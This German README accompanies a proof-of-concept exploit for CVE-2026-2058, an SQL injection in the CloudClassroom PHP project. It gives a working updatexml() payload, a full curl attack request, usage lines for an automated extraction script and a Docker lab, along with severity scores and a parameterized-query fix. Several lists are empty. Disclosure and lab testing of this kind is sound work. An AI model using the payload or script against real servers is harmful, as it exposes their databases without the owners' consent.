
Proof-of-Concept-Exploit für CVE-2026-2058, eine SQL-Injection im CloudClassroom-PHP-Projekt, mit automatisierter Datenbank-Enumeration und Datenextraktion.
Eine SQL-Injection-Schwachstelle existiert in der Post-Query-Funktionalität des CloudClassroom PHP-Projekts (v1.0).
Die Schwachstelle ermöglicht es Angreifern, beliebige SQL-Befehle über den squeryx-POST-Parameter einzuschleusen, was zu Datenbank-Enumeration und Datenextraktion führt.
Dieses Repository enthält einen Proof of Concept (PoC)-Exploit, der demonstriert, wie die Schwachstelle ausgenutzt werden kann, um sensible Daten aus der Backend-Datenbank zu extrahieren.
| Feld | Wert |
|---|
| CVE | CVE-2026-2058 |
| Schwachstellentyp | SQL-Injection |
| CWE | CWE-89 |
| Betroffene Software | CloudClassroom PHP-Projekt |
| Betroffene Version | 1.0 |
| Komponente | Post-Query-Funktionalität |
| Angriffsvektor | Remote |
| Authentifizierung nötig | Nein |
| Auswirkung | Datenbank-Offenlegung |
| Schweregrad | Hoch |
| Angriffsmuster-Referenz | CAPEC-66 |
POST /postquerypublic
squeryx
Der Backend-Code verkettet Benutzereingaben direkt in eine SQL-Abfrage, ohne ordnungsgemäße Bereinigung oder parametrisierte Abfragen.
Beispiel für verwundbaren Code:
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
Da $tempsquery aus Benutzereingaben stammt, können Angreifer beliebiges SQL einschleusen.
Für Test- und Forschungszwecke ist eine verwundbare Docker-Umgebung verfügbar.
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
Die Schwachstelle kann mithilfe einer fehlerbasierten SQL-Injection-Technik ausgelöst werden, die die MySQL-Funktion updatexml() nutzt.
Beispiel-Payload:
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
Beispiel für eine curl-Anfrage:
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
Erwartete Antwort:
XPATH syntax error: '~cc_db~'
Dieses Repository enthält einen Bash-Exploit, der automatisch:
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
Beispiel:
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
Ein Angreifer kann:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L⚠️ Hinweis: Der NVD-CVSS-Score weicht vom CNA- (VulDB-) Score ab, da unterschiedliche Auswirkungsbewertungen zugrunde liegen.
Das Exploit Prediction Scoring System (EPSS) schätzt die Wahrscheinlichkeit, dass eine Schwachstelle in freier Wildbahn ausgenutzt wird.
| CVE | EPSS-Wahrscheinlichkeit | Perzentil | Datum |
|---|---|---|---|
| CVE-2026-2058 | 0.00028 | 7.62 % | 2026-03-01 |
Quelle: FIRST EPSS-Datensatz
Entwickler sollten:
Beispiel für eine sichere Implementierung:
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();


Dieser Exploit wird ausschließlich für Bildungs- und Forschungszwecke bereitgestellt.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diesen Code verursacht werden.
bl4dsc4n
Sicherheitsforscher